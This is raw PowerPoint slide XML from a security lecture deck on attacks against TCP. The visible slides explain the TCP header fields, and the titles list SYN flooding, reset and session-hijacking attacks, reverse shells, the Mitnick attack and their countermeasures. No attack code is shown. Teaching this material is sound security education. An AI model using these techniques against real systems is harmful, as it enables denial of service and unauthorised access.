              <a:t>TCP client and server programming</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="284163" indent="-284163"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>TCP SYN flooding attack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="284163" indent="-284163"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>TCP Reset attack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="284163" indent="-284163"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>TCP Session Hijacking attack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="284163" indent="-284163"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Mitnick</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Attack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="401402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TCP Header</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="126" name="Shape 126"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="255275" y="965900"/>
            <a:ext cx="5009824" cy="2720792"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="127" name="Shape 127"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5156225" y="1144450"/>
            <a:ext cx="3930900" cy="38544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i="1" dirty="0"/>
              <a:t>TCP Segment: TCP Header + Data.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" i="1" u="sng" dirty="0"/>
              <a:t>Source and Destination port (16 bits each)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" u="sng" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t> Specify port numbers of the sender and the receiver.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" i="1" u="sng" dirty="0"/>
              <a:t>Sequence number (32 bits) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" u="sng" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>Specifies the sequence number of the first octet in the TCP segment. If SYN bit is set, it is the initial sequence number.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="128" name="Shape 128"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="255275" y="3612000"/>
            <a:ext cx="4849800" cy="1531500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>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sz="1800" i="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Acknowledgement number (32 bits)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Contains the value of the next sequence number expected by the sender of this segment. Valid only if ACK bit is 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a:t>TCP Header</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="134" name="Shape 134"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1152475"/>
            <a:ext cx="8520600" cy="3642300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" i="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Header length (4 bits): </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Length of TCP header is measured by the number of 32-bit words in the header, so we multiply by 4 to get number of octets in the header.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" i="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Reserved (6 bits): </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>This field is not used.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" i="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Code bits (6 bits):</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> There are six code bits, including SYN,FIN,ACK,RST,PSH and URG.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" i="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Window (16 bits):</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Window advertisement to specify the number of octets that the sender of this TCP segment is willing to accept. The purpose of this field is for flow control.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TCP Header</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="140" name="Shape 14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GB" i="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Checksum (16 bits):</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> The checksum is calculated using part of IP header, TCP header and TCP data.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" i="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Urgent Pointer (16 bits):</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> If the URG code bit is set, the first part of the data contains urgent data (do not consume sequence numbers). The urgent pointer specifies where the urgent data ends and the normal TCP data starts. Urgent data is for priority purposes as they do not wait in line in the receive buffer, and will be delivered to the applications immediately.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" i="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Options (0-320 bits, divisible by 32):</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> TCP segments can carry a variable length of options which provide a way to deal with the limitations of the original header.</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2393</TotalTime>
  <Words>3876</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (16:9)</PresentationFormat>
  <Paragraphs>263</Paragraphs>
  <Slides>65</Slides>
  <Notes>38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65</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="73" baseType="lpstr">
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Calibri Light</vt:lpstr>
      <vt:lpstr>Courier New</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Simple Light</vt:lpstr>
      <vt:lpstr>Office Theme</vt:lpstr>
      <vt:lpstr>1_Office Theme</vt:lpstr>
      <vt:lpstr>Attacks on TCP</vt:lpstr>
      <vt:lpstr>Outline</vt:lpstr>
      <vt:lpstr>TCP Protocol</vt:lpstr>
      <vt:lpstr>Data Transmission</vt:lpstr>
      <vt:lpstr>Data Transmission</vt:lpstr>
      <vt:lpstr>Question</vt:lpstr>
      <vt:lpstr>TCP Header</vt:lpstr>
      <vt:lpstr>TCP Header</vt:lpstr>
      <vt:lpstr>TCP Header</vt:lpstr>
      <vt:lpstr>TCP 3-way Handshake Protocol</vt:lpstr>
      <vt:lpstr>Establishing Connections</vt:lpstr>
      <vt:lpstr>TCP 3-way Handshake Protocol</vt:lpstr>
      <vt:lpstr>SYN Flooding Attack</vt:lpstr>
      <vt:lpstr>SYN Flooding Attack</vt:lpstr>
      <vt:lpstr>Launching SYN Flooding Attack – Before Attacking</vt:lpstr>
      <vt:lpstr>SYN Flooding Attack - Results</vt:lpstr>
      <vt:lpstr>Launching SYN Flooding Attacks Using Scapy</vt:lpstr>
      <vt:lpstr>What Makes SYN Flooding Attack Fail</vt:lpstr>
      <vt:lpstr>What Makes SYN Flooding Attack Fail</vt:lpstr>
      <vt:lpstr> • TCP Retransmission Issue</vt:lpstr>
      <vt:lpstr> Size of The Queue</vt:lpstr>
      <vt:lpstr> TCP Cache Issue</vt:lpstr>
      <vt:lpstr>The SYN Cookie Countermeasure</vt:lpstr>
      <vt:lpstr>Countermeasures: SYN Cookies</vt:lpstr>
      <vt:lpstr> Turn On/Off SYN Cookie</vt:lpstr>
      <vt:lpstr>TCP Reset Attack</vt:lpstr>
      <vt:lpstr>TCP Reset Attack</vt:lpstr>
      <vt:lpstr>Constructing Reset Packet</vt:lpstr>
      <vt:lpstr>Captured TCP Connection Data</vt:lpstr>
      <vt:lpstr>TCP Reset Attack on Telnet Connection</vt:lpstr>
      <vt:lpstr>Auto TCP Rest Attack: Sample Code</vt:lpstr>
      <vt:lpstr>TCP Reset Attack on SSH connections</vt:lpstr>
      <vt:lpstr>Question</vt:lpstr>
      <vt:lpstr>TCP Session Hijacking Attack</vt:lpstr>
      <vt:lpstr>TCP Session Hijacking Attack: Sequence Number</vt:lpstr>
      <vt:lpstr>Hijacking a Telnet Connection</vt:lpstr>
      <vt:lpstr>What Command Do We Want to Run</vt:lpstr>
      <vt:lpstr>Session Hijacking: Steal a Secret</vt:lpstr>
      <vt:lpstr>Launch the TCP Session Hijacking Attack</vt:lpstr>
      <vt:lpstr>Session Hijacking: Automatic Spoofing</vt:lpstr>
      <vt:lpstr>Creating Reverse shell</vt:lpstr>
      <vt:lpstr>Reverse Shell</vt:lpstr>
      <vt:lpstr>File Descriptors and Standard I/O</vt:lpstr>
      <vt:lpstr>I/O Redirect</vt:lpstr>
      <vt:lpstr>I/O Redirect Example</vt:lpstr>
      <vt:lpstr>Redirecting I/O to TCP Connection</vt:lpstr>
      <vt:lpstr>Reverse Shell </vt:lpstr>
      <vt:lpstr>Redirecting I/O to TCP Connection</vt:lpstr>
      <vt:lpstr>Why the Connection Freezes</vt:lpstr>
      <vt:lpstr>Mitnick Attack</vt:lpstr>
      <vt:lpstr>Mitnick Attack: Technical Details</vt:lpstr>
      <vt:lpstr>A Simplified Mitnick Attack</vt:lpstr>
      <vt:lpstr>Spoofing SYN Packet</vt:lpstr>
      <vt:lpstr>Shutdown the Client: Emulation</vt:lpstr>
      <vt:lpstr>Spoofing ACK and Data (1)</vt:lpstr>
      <vt:lpstr>Spoofing ACK and Data (2)</vt:lpstr>
      <vt:lpstr>Demo</vt:lpstr>
      <vt:lpstr>The Behavior of rsh</vt:lpstr>
      <vt:lpstr>Silencing the Trusted Server</vt:lpstr>
      <vt:lpstr>The Behavior of rsh</vt:lpstr>
      <vt:lpstr>The Behavior of rsh</vt:lpstr>
      <vt:lpstr>The Second Connection and Executing the Command</vt:lpstr>
      <vt:lpstr>Defending Against Session Hijacking</vt:lpstr>
      <vt:lpstr>Questions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Attacks on the TCP Protocol</dc:title>
  <cp:lastModifiedBy>Xiaodong Yue</cp:lastModifiedBy>
  <cp:revision>168</cp:revision>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-02-27T19:27:10Z</dcterms:modified>
</cp:coreProperties>
</file>